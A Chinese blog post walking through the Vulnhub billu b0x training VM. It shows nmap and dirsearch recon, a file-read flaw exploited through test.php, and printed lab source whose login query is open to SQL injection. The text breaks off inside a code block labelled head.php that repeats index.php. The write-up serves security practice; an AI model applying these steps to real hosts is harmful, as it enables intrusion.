<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.22.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="Vulnhub靶机billu b0x的渗透实战记录，每一步都有详细的思路和操作过程 靶机简介官方下载地址：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;billu-b0x,188&#x2F;  目标是获得靶机root权限。话不多说，直接开始：">
<meta property="og:type" content="article">
<meta property="og:title" content="billu b0x靶场渗透提权(超详细)">
<meta property="og:url" content="http://example.com/2025/02/21/billu%20b0x%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F%E6%8F%90%E6%9D%83(%E8%B6%85%E8%AF%A6%E7%BB%86)/index.html">
<meta property="og:site_name" content="Code Crafting">
<meta property="og:description" content="Vulnhub靶机billu b0x的渗透实战记录，每一步都有详细的思路和操作过程 靶机简介官方下载地址：https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;billu-b0x,188&#x2F;  目标是获得靶机root权限。话不多说，直接开始：">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250115198.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250144485.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250117828.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250117182.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250118006.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250118096.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250118970.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250118136.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250119994.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250119681.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250119237.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250119188.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250120649.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250120053.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250120918.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250121840.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250121252.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250121867.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250121466.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122753.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122308.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122451.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122762.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250122159.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123110.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123857.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123992.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123974.png">
<meta property="og:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250123725.png">
<meta property="article:published_time" content="2025-02-21T10:11:11.977Z">
<meta property="article:modified_time" content="2025-02-21T10:11:11.977Z">
<meta property="article:author" content="Jason Li">
<meta property="article:tag" content="攻防">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250115198.png">


<link rel="canonical" href="http://example.com/2025/02/21/billu%20b0x%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F%E6%8F%90%E6%9D%83(%E8%B6%85%E8%AF%A6%E7%BB%86)/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2025/02/21/billu%20b0x%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F%E6%8F%90%E6%9D%83(%E8%B6%85%E8%AF%A6%E7%BB%86)/","path":"2025/02/21/billu b0x靶场渗透提权(超详细)/","title":"billu b0x靶场渗透提权(超详细)"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>billu b0x靶场渗透提权(超详细) | Code Crafting</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Code Crafting</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">There are two equivalence classes of idiots: Those who yearn for the past that never was. AND Those who dream of the future that never will be.</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%9D%B6%E6%9C%BA%E7%AE%80%E4%BB%8B"><span class="nav-number">1.</span> <span class="nav-text">靶机简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%9B%E8%A1%8C%E9%9D%B6%E6%9C%BA%E5%8F%91%E7%8E%B0%E4%B8%8E%E6%9C%8D%E5%8A%A1%E5%8F%91%E7%8E%B0"><span class="nav-number">2.</span> <span class="nav-text">进行靶机发现与服务发现</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web%E6%B8%97%E9%80%8F"><span class="nav-number">3.</span> <span class="nav-text">web渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B7%AF%E5%BE%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="nav-number">3.1.</span> <span class="nav-text">路径暴力破解</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AF%BB%E6%89%BE%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8%E7%9A%84%E4%B8%9C%E8%A5%BF"><span class="nav-number">3.2.</span> <span class="nav-text">寻找可以利用的东西</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8test-php%E5%8F%91%E7%8E%B0%E6%BC%8F%E6%B4%9E"><span class="nav-number">3.3.</span> <span class="nav-text">利用test.php发现漏洞</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AF%BB%E6%89%BE%E6%BC%8F%E6%B4%9E"><span class="nav-number">4.</span> <span class="nav-text">寻找漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%91%E7%8E%B0%E5%B9%B6%E5%88%A9%E7%94%A8%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="nav-number">4.1.</span> <span class="nav-text">发现并利用文件上传漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%8A%E4%BC%A0%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E6%96%87%E4%BB%B6"><span class="nav-number">4.1.1.</span> <span class="nav-text">上传一句话木马文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B5%8B%E8%AF%95%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="nav-number">4.1.2.</span> <span class="nav-text">测试是否可以执行命令</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%BB%BA%E7%AB%8B%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">5.</span> <span class="nav-text">建立反弹shell</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">6.</span> <span class="nav-text">提权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A5%E5%85%851%EF%BC%9A%E5%BB%BA%E7%AB%8B%E5%8F%8D%E5%BC%B9shell%E7%9A%84%E5%8F%A6%E4%B8%80%E7%A7%8D%E6%96%B9%E5%BC%8F"><span class="nav-number">7.</span> <span class="nav-text">补充1：建立反弹shell的另一种方式</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A5%E5%85%852%EF%BC%9A%E7%BE%8E%E5%8C%96reverse-shell"><span class="nav-number">8.</span> <span class="nav-text">补充2：美化reverse shell</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Jason Li</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/02/21/billu%20b0x%E9%9D%B6%E5%9C%BA%E6%B8%97%E9%80%8F%E6%8F%90%E6%9D%83(%E8%B6%85%E8%AF%A6%E7%BB%86)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Jason Li">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Code Crafting">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="billu b0x靶场渗透提权(超详细) | Code Crafting">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          billu b0x靶场渗透提权(超详细)
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-02-21 18:11:11" itemprop="dateCreated datePublished" datetime="2025-02-21T18:11:11+08:00">2025-02-21</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">网络安全</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>2.6k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>9 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250115198.png" alt="image-20231024201252834"></p>
<p>Vulnhub靶机billu b0x的渗透实战记录，每一步都有详细的思路和操作过程</p>
<h1 id="靶机简介"><a href="#靶机简介" class="headerlink" title="靶机简介"></a>靶机简介</h1><p>官方下载地址：<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/billu-b0x,188/">https://www.vulnhub.com/entry/billu-b0x,188/</a></p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250144485.png" alt="image-20231025014413349"></p>
<p>目标是获得靶机root权限。话不多说，直接开始：</p>
<span id="more"></span>

<h1 id="进行靶机发现与服务发现"><a href="#进行靶机发现与服务发现" class="headerlink" title="进行靶机发现与服务发现"></a>进行靶机发现与服务发现</h1><ol>
<li><p>靶机发现</p>
<p>使用<code>arp-scan -l</code>命令，扫描出局域网上活动主机信息，发现10.0.2.8疑似靶机ip</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250117828.png" alt="image-20231025011725465"></p>
</li>
<li><p>端口扫描</p>
<p>对10.0.2.8进行端口扫描，使用<code>nmap</code>命令</p>
<p><code>nmap -p- --min-rate=1000 10.0.2.8</code></p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250117182.png" alt="image-20231025011743824"></p>
<p>靶机开启了22端口和80端口</p>
</li>
<li><p>进一步扫描获取服务细节</p>
<p><code>nmap -p 22,80 -sV -sC 10.0.2.8</code></p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250118006.png" alt="image-20231025011808646"></p>
<p>web服务是常见的渗透入口，所以从浏览器访问靶机80端口</p>
</li>
</ol>
<h1 id="web渗透"><a href="#web渗透" class="headerlink" title="web渗透"></a>web渗透</h1><p>靶机web服务如下</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250118096.png" alt="image-20231025011824734"></p>
<p>尝试简单的SQL注入，失败。尝试其他方法</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250118970.png" alt="image-20231025011839593"></p>
<h2 id="路径暴力破解"><a href="#路径暴力破解" class="headerlink" title="路径暴力破解"></a>路径暴力破解</h2><p>使用<code>dirsearch</code>工具对靶机web服务进行路径暴力破解</p>
<p><code>dirsearch -u http://10.0.2.8</code></p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250118136.png" alt="image-20231025011854781"></p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250119994.png" alt="image-20231025011903634"></p>
<p>找到其中所有状态码为200和302的结果：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">[20:16:31] 200 -  307B  - /add.php</span><br><span class="line">[20:16:31] 200 -  307B  - /add</span><br><span class="line">[20:16:41] 200 -    1B  - /c</span><br><span class="line">[20:16:50] 200 -    3KB - /head.php  </span><br><span class="line">[20:16:51] 200 -    1KB - /images/</span><br><span class="line">[20:16:51] 200 -   47KB - /in</span><br><span class="line">[20:16:51] 200 -    3KB - /index</span><br><span class="line">[20:16:51] 200 -    3KB - /index.php</span><br><span class="line">[20:16:58] 302 -    2KB - /panel  -&gt;  index.php                             </span><br><span class="line">[20:16:58] 302 -    2KB - /panel.php  -&gt;  index.php</span><br><span class="line">[20:17:00] 200 -    8KB - /phpmy/</span><br><span class="line">[20:17:05] 200 -    1B  - /show</span><br><span class="line">[20:17:08] 200 -   72B  - /test</span><br><span class="line">[20:17:08] 200 -   72B  - /test.php</span><br></pre></td></tr></table></figure>

<h2 id="寻找可以利用的东西"><a href="#寻找可以利用的东西" class="headerlink" title="寻找可以利用的东西"></a>寻找可以利用的东西</h2><p>访问add.php, head.php, index.php, panel.php, test.php后发现，add页面是上传照片，head是登录界面图片，index是登录页面，panel暂时无法访问(可能是登陆后才能访问的页面)，test似乎是执行与文件相关的命令</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250119681.png" alt="image-20231025011915320"></p>
<p>目前test看起来最有用</p>
<h2 id="利用test-php发现漏洞"><a href="#利用test-php发现漏洞" class="headerlink" title="利用test.php发现漏洞"></a>利用test.php发现漏洞</h2><p>尝试给url加上参数看能否访问或执行文件。能访问则是文件下载漏洞，能执行则是文件包含漏洞，后者更好利用。我们试试index.php，因为它与登录有关。</p>
<p>给url直接加参数(使用get请求)，没有任何结果</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250119237.png" alt="image-20231025011925882"></p>
<p>尝试改为post请求</p>
<p>使用BurpSuite拦截请求，在Repeater中修改为post请求并发送</p>
<p><img src="https://hachaosg2p-1308589153.cos.ap-nanjing.myqcloud.com/202310250119188.png" alt="image-20231025011934832"></p>
<p>发现成功获得了文件内容。说明有<strong>文件下载漏洞</strong>，同时也排除了文件包含漏洞。</p>
<p>通过改漏洞查看各php文件内容(此处不需要仔细看，后文提及时再回来看)</p>
<ul>
<li><p>add.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;form  method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;</span></span><br><span class="line"><span class="string">    Select image to upload:</span></span><br><span class="line"><span class="string">    &lt;input type=&quot;file&quot; name=image&gt;</span></span><br><span class="line"><span class="string">	&lt;input type=text name=name value=&quot;name&quot;&gt;</span></span><br><span class="line"><span class="string">	&lt;input type=text name=address value=&quot;address&quot;&gt;</span></span><br><span class="line"><span class="string">	&lt;input type=text name=id value=1337 &gt;</span></span><br><span class="line"><span class="string">    &lt;input type=&quot;submit&quot; value=&quot;upload&quot; name=&quot;upload&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;/form&gt;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>index.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;c.php&#x27;</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;head.php&#x27;</span>);</span><br><span class="line"><span class="keyword">if</span>(@<span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]!=<span class="literal">true</span>)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]=<span class="string">&#x27;&#x27;</span>;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]==<span class="literal">true</span> &amp;&amp;  <span class="variable">$_SESSION</span>[<span class="string">&#x27;admin&#x27;</span>]!=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;you are logged in :)&quot;</span>;</span><br><span class="line">	<span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: panel.php&#x27;</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;div align=center style=&quot;margin:30px 0px 0px 0px;&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;font size=8 face=&quot;comic sans ms&quot;&gt;--==[[ billu b0x ]]==--&lt;/font&gt; </span></span><br><span class="line"><span class="string">&lt;br&gt;&lt;br&gt;</span></span><br><span class="line"><span class="string">Show me your SQLI skills &lt;br&gt;</span></span><br><span class="line"><span class="string">&lt;form method=post&gt;</span></span><br><span class="line"><span class="string">Username :- &lt;Input type=text name=un&gt; &amp;nbsp Password:- &lt;input type=password name=ps&gt; &lt;br&gt;&lt;br&gt;</span></span><br><span class="line"><span class="string">&lt;input type=submit name=login value=&quot;let\&#x27;s login&quot;&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;login&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="variable">$uname</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;\&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;un&#x27;</span>]));</span><br><span class="line">	<span class="variable">$pass</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;\&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;ps&#x27;</span>]));</span><br><span class="line">	<span class="variable">$run</span>=<span class="string">&#x27;select * from auth where  pass=\&#x27;&#x27;</span>.<span class="variable">$pass</span>.<span class="string">&#x27;\&#x27; and uname=\&#x27;&#x27;</span>.<span class="variable">$uname</span>.<span class="string">&#x27;\&#x27;&#x27;</span>;</span><br><span class="line">	<span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$run</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">mysqli_num_rows</span>(<span class="variable">$result</span>) &gt; <span class="number">0</span>) &#123;</span><br><span class="line"></span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysqli_fetch_assoc</span>(<span class="variable">$result</span>);</span><br><span class="line">	   <span class="keyword">echo</span> <span class="string">&quot;You are allowed&lt;br&gt;&quot;</span>;</span><br><span class="line">	   <span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]=<span class="literal">true</span>;</span><br><span class="line">	   <span class="variable">$_SESSION</span>[<span class="string">&#x27;admin&#x27;</span>]=<span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">	   </span><br><span class="line">	 <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: panel.php&#x27;</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">   </span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt;alert(&#x27;Try again&#x27;);&lt;/script&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">	</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;font size=5 face=\&quot;comic sans ms\&quot; style=\&quot;left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\&quot;&gt;B0X Powered By &lt;font color=#ff9933&gt;Pirates&lt;/font&gt; &quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>head.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;c.php&#x27;</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;head.php&#x27;</span>);</span><br><span class="line"><span class="keyword">if</span>(@<span class="variable">$_SESSION</span>[<span class="string">&#x27;logged&#x27;</span>]!=<span class="literal">true</span>)</span><br><span class="line">&#123;</span><br><span class="line">	